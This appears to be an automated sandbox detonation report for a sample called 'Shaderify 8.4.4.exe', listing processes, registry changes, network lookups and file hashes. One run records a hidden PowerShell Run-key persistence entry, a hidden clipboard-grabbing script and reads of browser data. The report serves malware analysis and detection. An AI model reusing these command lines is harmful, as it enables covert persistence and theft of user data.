rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=808 --field-trial-handle=2676,i,447940133669489189,1353734109898858672,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| GB | 96.16.110.114:80 | N/A | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| GB | 142.250.187.202:443 | N/A | tcp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.107.17.2.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | N/A | tcp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240221-en
Max time kernel
118s
Max time network
124s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 220
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240419-en
Max time kernel
118s
Max time network
122s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240221-en
Max time kernel
119s
Max time network
145s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (data omitted) | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{778934C1-218E-11EF-989B-729E5AF85804} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "423569994" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000985100581ca0144aa549c45968cf3753000000000200000000001066000000010000200000006632754287c65a534fe9c789ed26e5b214c9d97d3b9d5e84e82c411370c89a80000000000e8000000002000020000000010db850348d8b803e5b549288f446fe623b655ae73a45ce4a485e4bd5b9654e20000000efdfae6d201f807aaf0774f7b570425906878177580fcb1cedf84f1b7755743840000000d1ab5e06245ccd1bcfff217b34e91abfab4248c211c22ef4c26f4f59df76b940807a977fb4118d7bc29e48db8e6a8d27ae7f2f26af9906cbabdbec307711577e | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e011ad4c9bb5da01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2900 wrote to memory of 2920 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2900 wrote to memory of 2920 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2900 wrote to memory of 2920 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2900 wrote to memory of 2920 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2900 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabD4AF.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarD5D0.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f3bd72df291282105c87b13173c81ca0 |
| SHA1 | ab9238ac4a1b39852ee1f45b91a3f012cf07d9b1 |
| SHA256 | 1d6d59db786ae096d3902542ede28a761cad18777e4e4e5a244d718f8a35b109 |
| SHA512 | 7f296d04f0156013b56d8ee1bc1432e3d4ba4c2120ad61ac2f840a4e1cc0973daf58fe4481e697f640c121361d2c7ca048976c6192aefa1e1af7291a287aa8f5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 97717d0de8650a603bdae5f158d39402 |
| SHA1 | b8a8acc684a6e10fd811f110c650cf5bd6832f18 |
| SHA256 | 2697ad24e47a89ccaaa343d32d2acef9b95462dda5f93e1c82697078c804ff66 |
| SHA512 | 45d03e9b5fa817415d02aaab2799ecc424b0f3818e5fdcec44518c77ebe3ea5fecb1f5e82e577e74f270480c7f2015e7de5b853536dda431a6929ff2272451bd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 012e6540fdc11b438acce8ee4def2fa3 |
| SHA1 | 4b00789a9671eddd911746673976c117d735bd07 |
| SHA256 | ccbd5c85b1ff95c7d8a8ae7f20ef8b86e398df72b3fa46590b455b72e24c31a0 |
| SHA512 | 3b54d174b271f0c1d05c7a1c72861edd683c4ef3259c9aaf7f876f83e2181a9b011791f718479ec775f77c1b2da5185081f0234ebeda90a6457dd7255f2ce241 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d4db13edcff887c98616588f56019056 |
| SHA1 | 49f06394fd409ec498534c75390056f7cb22ed15 |
| SHA256 | 5085c1ccf1089a314748278990c0c7a9a5e2bb3cd4942a383062f7d347ba7be1 |
| SHA512 | 9d3684d380b06119b460a7d0678fe49b4f56eb7a51b163b3c59c70979971ac4beaca2dde2f3939b23373ef5bb1ea6bdb42d304f1f48fed2aebaf00cb5920f609 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 491fc170b8a6f538a0c2eeb2a83165f3 |
| SHA1 | 06df7c2be0dcaf9ab339fe2b90e840ffd920d050 |
| SHA256 | 9910e1ba8994dbebbbf10ff22762f5969625e7aa60d1ed4c9216c29a89ad5a37 |
| SHA512 | 49d84d8158b47e510f7648311e847bcfbec5a7697d2a56695b6e2a182a3bea418f3e0b3d893e6cf260ce3e8388ea1bee5f284b54c1afb3c37b600c67cbcfb837 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 465b584a4603af5fdb782381e18e8ff5 |
| SHA1 | 79701cc458ad8291140eda9fb8ede6faa4136e29 |
| SHA256 | 9db08e97a35e27481fe532420066aeebc945ab8e7ae0f2c07d67fbb2a825ad0c |
| SHA512 | 91ddaf3bcb691959ec6f6068fbc12f9911fafe5f2dd7a8ea7cdf74731d30d5c836824ed5f7513f47837c51149b6973f022674ba7a793a2ddfbf63e993772635d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 896ef82fc3698e0a2ded88dc83adf642 |
| SHA1 | 7477583fd23b2fc015b1050965d1853c36aaaf02 |
| SHA256 | 4f3f1d931f9481b1463a15ad8834fbd2d1bedc7d6a1f5e1dc133eeaabb2906ba |
| SHA512 | bab594ce49aabdd395d633dd83171a124fe8a796f9dd71d871f16777b8837af8f9c5738a40d8d467350eae808756bb1266f1949fae677afc0621f1935e4803b8 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2072fe2b0120ae2f527b0fe2a1e1539e |
| SHA1 | 00db9178049141ae4c426d359b8da3f3718378ee |
| SHA256 | 4a13ae32feda052f24f3eae9eed6d68f0f1550b16804c1419bc075b3bc947546 |
| SHA512 | bad3641f34bb38e9f7d0172c1895d9b4da447876f62e0866402b6b674fc3748c12aeaa30b5a16c960593021ba771c27e43f4ea7a6e53ef1abf8f6606eb0f5259 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d2f57f647697f9b66b2c73114474ffe8 |
| SHA1 | 1fc8700bd248d2b49da9267cde43db7d090c6c5d |
| SHA256 | 0a7e45a1d14b5ff9df390e8f4f13d5106d2df08527a4ca78c1f0a7c52a1db3cf |
| SHA512 | 8a26465139233875aabdf05f4514825b3c8c5f436cd883a577b5d3a28e209fab34eedb0d9b1f0fa2e18632e5a46cef1712172aea4356f993b46116a1c31e7229 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 31dc51edafb8f88c062e0abfdc1473b9 |
| SHA1 | 25239888ef7dbe03bec2c86f7a4471042e117f8d |
| SHA256 | 086925dd5479e7a638cf6e50db89b919d1507f6716fa4a1f7cb6918192df6967 |
| SHA512 | 8cf31f803577a0fe59b35f2fbaa98e9b3072f63a5a03552849fcbbbe3cbaac5ad5394b290b3df62e7b73ddbf845290ea1b002164732a20cd1d163fc49617114e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c563bca91146ac2a02027fb735758107 |
| SHA1 | d467774e5548e5b267b494c3bcdeef8d23b52b11 |
| SHA256 | faebebf94a552a6bff0090c621605b6b96565453c27239ff00e0cf45d16e6799 |
| SHA512 | 9f21c2482c261b8b4177ecf2427767581278b12b7426221301b5302c39586d19d93613a9ae4ede610115a833ac37ffbb57ce93b73a2603943d1c005de47714c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 484317642050745f34c5047dc327c351 |
| SHA1 | 5803ce6d808bd154a809862149cae9880fe9c460 |
| SHA256 | d613fc4f59cbb389b38165aafcc1ed8ad457afad13e322e834ab712dae9c7a32 |
| SHA512 | fd065e6d12994aef37e05fe7b63e028b5737298f810f2a6bf921c44ebf034a0df9df0be8dd46678d5ba3765e8a11c4ff259b84769b699404b964533bb4bfb6b9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | deaceed086a4762a423cd3c575a636f2 |
| SHA1 | 15d76daa76c4d441984e84bec8435dd0717df14c |
| SHA256 | 0c256efcac734bba35ef053bacd2795e9f1cc51cebe4f665a272e9d596b08e9d |
| SHA512 | c3997a274762cff8d333ed3b169f2eb5c5f031603f044173663fd1ac9f893e857397ecfd3d1d30ffdd6393aec4b5baa206cb5206e92033c4274f5c71b52ef897 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3fae89cb4c4fae7b53d7edd2f0435e9b |
| SHA1 | 3df2465f7d23f4814c43259336e26b4bf84631e8 |
| SHA256 | 6188fa5813c2cc1afb1415e50e4eb18f05ddbd8784765689d4d9a917d61ae40b |
| SHA512 | 6a9fe04df2c0090811ed720c53fe1bc4bfeebecab4b662ceea07ef0154f8884da6e30415f3d8139c9e856b35c91cf7f70553ec1ca4581120980e3f84c3488e0e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2e057036ef9261e45d9f5988e834f043 |
| SHA1 | cf26d4ac8c6c16a6c5092668bf21ce3fbf6d3cf5 |
| SHA256 | 55ca8f4b8e8b3c190ed876d83bef5797e79697300ca2c50bf7327f88a0633c3b |
| SHA512 | 5099a67e80cc16306c72649a7234fd5e1d6e352a3c3822dc59a3bb6ae57aa5c82e9335f32a752d615b68357c85b9bb36442fa2c12ad43d3150688afc88f7611c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8ec93158e0eeed69810d592b18c864d8 |
| SHA1 | 72d08746f26b317382d0ee09529f4f7f042def5d |
| SHA256 | aab8fe1fb12e01af3a9502ce14626e29a4fba72dbfe8eb8c8edd3c8a5dc64a33 |
| SHA512 | 8da704fde44550d686e5871d69a1ef392c5a6874e312a3d00ee244b83f0b3d418fb03d9ee607cbb5104ce1230207d29f9c25967fac336a6b41fa8005d40ae10c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0258a3dc5a94e62d2ce404257923828b |
| SHA1 | 717edbba2928865483f66d4c5f2c0833cd3c0764 |
| SHA256 | 32e584e1db80d9477a8c15007a44eb10469d4f7428d8bd990ae55133f2a6f73e |
| SHA512 | 0d042559feb275379d02af1f1949c0d1f5bc739b5eb24ff2777ebed5e06e89d7d0646e2384857a068c0d2f91a0d7e3e16ef6edc637419952dc0706b56d67593c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8e25a739842948c424a3eb9db1260265 |
| SHA1 | 801a0038d873a82b7fc6bed30e5304698e0a35c1 |
| SHA256 | 72ce27e90a551e42841289b3f0e8ddb85208c4828539a34fe38ce58194b541fb |
| SHA512 | 43f8ea2817882bf97df4075a5a03e159d9cac646dd78e34af424a3ce186bb8218412b99d9f29d4261df06e92648347eacd95b638e0472e801b751de7a6f9d8c6 |
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240426-en
Max time kernel
146s
Max time network
151s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240508-en
Max time kernel
118s
Max time network
125s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240508-en
Max time kernel
150s
Max time network
121s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\QVPnzohsyxBSOWa.ps1\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify 8.4.4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Shaderify 8.4.4.exe
"C:\Users\Admin\AppData\Local\Temp\Shaderify 8.4.4.exe"
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
